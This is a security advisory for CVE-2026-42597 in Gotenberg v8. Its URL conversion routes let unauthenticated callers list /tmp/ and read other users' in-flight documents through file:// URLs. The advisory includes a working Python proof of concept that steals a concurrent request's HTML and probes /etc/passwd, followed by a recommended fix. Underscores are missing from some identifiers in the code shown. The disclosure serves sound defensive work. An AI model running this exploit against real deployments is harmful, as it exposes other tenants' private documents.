PT-2026-38387 · Go · Github.Com/Gotenberg/Gotenberg/V8

Published

2026-05-07

·

Updated

2026-05-07

·

CVE-2026-42597

CVSS v3.1

5.9

Medium

VectorAV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

The /forms/chromium/convert/url and /forms/chromium/screenshot/url routes accept url=file:///tmp/... from anonymous callers. The default Chromium deny-list intentionally exempts file:///tmp/ so HTML/Markdown routes can load their own request-local assets, and those routes apply a per-request AllowedFilePrefixes guard to scope the read. The URL routes never set AllowedFilePrefixes, so the scope guard silently skips. Alice enumerates /tmp/, walks Gotenberg's per-request working directories, and reads the raw source files of other in-flight conversions as rendered PDF output.

Details

The default deny-list regex at pkg/modules/chromium/chromium.go:449 uses a negative lookahead to exempt /tmp/:
fs.StringSlice("chromium-deny-list",
  []string{`^file:(?!///tmp/).*`},
  "Set the denied URLs for Chromium using regular expressions - supports multiple values")
pkg/gotenberg/outbound.go:185-187 short-circuits IP validation for non-HTTP schemes:
if !httpLikeScheme(parsed.Scheme) {
  return outboundDecision{}, nil
}
So any file:///tmp/... URL passes FilterOutboundURL cleanly.
The HTML route pairs the exemption with a per-request scope guard (pkg/modules/chromium/routes.go:518):
options.AllowedFilePrefixes = []string{ctx.DirPath()}
and the CDP Fetch.requestPaused handler enforces the scope (pkg/modules/chromium/events.go:65-78):
if allow && strings.HasPrefix(e.Request.URL, "file://") && len(options.allowedFilePrefixes) > 0 {
  prefixMatch := false
  for , prefix := range options.allowedFilePrefixes {
    if strings.HasPrefix(e.Request.URL, "file://"+prefix) {
      prefixMatch = true
      break
    }
  }
  if !prefixMatch {
    allow = false
  }
}
The len(options.allowedFilePrefixes) > 0 condition skips the entire enforcement block when the slice is empty. The URL route handler at pkg/modules/chromium/routes.go:406-448 (convertUrlRoute) never populates AllowedFilePrefixes. MandatoryString("url", &url) takes the form value without scheme validation and passes it to convertUrlchromium.Pdf → Chromium navigation.
Gotenberg stores uploaded request assets at /tmp/<gotenberg-work-uuid>/<request-uuid>/<file-uuid>.<ext> (pkg/gotenberg/fs.go:64-65). Chromium renders the targeted file:// URL as a PDF and the response body returns to the caller.

Proof of Concept

Reproduction uses the stock Docker image with no auth:
docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
Python script. Alice attacks, Bob runs a slow legitimate conversion whose request directory stays alive long enough for Alice to locate it. waitDelay=15s stands in for any naturally slow convert (large DOCX, multi-page HTML with external fetches, LibreOffice rendering a complex spreadsheet):
import requests, threading, time, subprocess, re
TARGET = "http://localhost:3000"
SECRET = f"BOB-CROSS-REQ-LEAK-{int(time.time())}"

bob html = f"<html><body><h1>{SECRET}</h1></body></html>".encode()

def bob runs():
  requests.post(
    f"{TARGET}/forms/chromium/convert/html",
    files={"files": ("index.html", bob html, "text/html")},
    data={"waitDelay": "15s"},
    timeout=60,
  )

def alice reads(url):
  r = requests.post(
    f"{TARGET}/forms/chromium/convert/url",
    files={"url": (None, url)}, timeout=30,
  )
  if r.status code != 200: return None
  open("/tmp/ alice.pdf", "wb").write(r.content)
  return subprocess.run(
    ["pdftotext", "/tmp/ alice.pdf", "-"],
    capture output=True, text=True,
  ).stdout

threading.Thread(target=bob runs, daemon=True).start()
time.sleep(2)

# Step 1: list /tmp/ to discover the gotenberg work UUID
tmp = alice reads("file:///tmp/")
work = re.search(r"([0-9a-f-]{36})", tmp).group(1)

# Step 2: walk into the work dir to find an in-flight request dir
wd = alice reads(f"file:///tmp/{work}/")
for req in re.findall(r"([0-9a-f-]{36})", wd):
  if req == work: continue
  rd = alice reads(f"file:///tmp/{work}/{req}/")
  if rd and (m := re.search(r"([0-9a-f-]{36}.html)", rd)):
    # Step 3: read bob's uploaded HTML
    txt = alice reads(f"file:///tmp/{work}/{req}/{m.group(1)}")
    print("SECRET recovered:", SECRET in txt)
    break

# Sanity: /etc/passwd stays blocked (deny-list holds outside /tmp)
r = requests.post(f"{TARGET}/forms/chromium/convert/url",
  files={"url": (None, "file:///etc/passwd")}, timeout=30)
print(f"/etc/passwd probe: HTTP {r.status code}") # 403 Forbidden
Output against gotenberg 8.31.0:
SECRET recovered: True
/etc/passwd probe: HTTP 403
file:///tmp/ directory enumeration works on every request, unconditionally. Cross-request content read depends on timing: Alice needs the victim's request dir alive when she walks to it. Long-running legitimate conversions (large inputs, external HTTP fetches, explicit waitDelay) widen the window from milliseconds to seconds.

Impact

An unauthenticated caller enumerates /tmp/ on the Gotenberg host and reads the raw source files of other users' conversion requests while those requests are in flight. Content types include uploaded HTML, Markdown, Office documents awaiting LibreOffice conversion, and output PDFs staged for webhook delivery. The rendered file returns to the attacker as a PDF. In a multi-tenant deployment where multiple users submit documents to the same Gotenberg instance, cross-tenant document exfiltration is possible whenever the attacker wins the timing race against a victim's request lifecycle. Directory enumeration itself (the work-UUID and per-request-UUID structure) is available regardless of timing.
The deny-list regex holds for paths outside /tmp/. file:///etc/passwd, file:///proc/self/environ, and similar targets return HTTP 403. The primitive is scoped to /tmp/, not arbitrary filesystem read.

Recommended Fix

Remove the len(options.allowedFilePrefixes) > 0 condition at pkg/modules/chromium/events.go:65 so URL routes block every file:// sub-resource by default:
if allow && strings.HasPrefix(e.Request.URL, "file://") {
  if len(options.allowedFilePrefixes) == 0 {
    allow = false
  } else {
    prefixMatch := false
    for , prefix := range options.allowedFilePrefixes {
      if strings.HasPrefix(e.Request.URL, "file://"+prefix) {
        prefixMatch = true
        break
      }
    }
    if !prefixMatch {
      allow = false
    }
  }
}
Equivalent alternative: reject non-http/https schemes in the URL route handlers (convertUrlRoute, screenshotUrlRoute) before handing the URL to Chromium.

Found by aisafe.io

Fix

SSRF

Weakness Enumeration

Related Identifiers

CVE-2026-42597
GHSA-G924-CJX7-2RJW

Affected Products

Github.Com/Gotenberg/Gotenberg/V8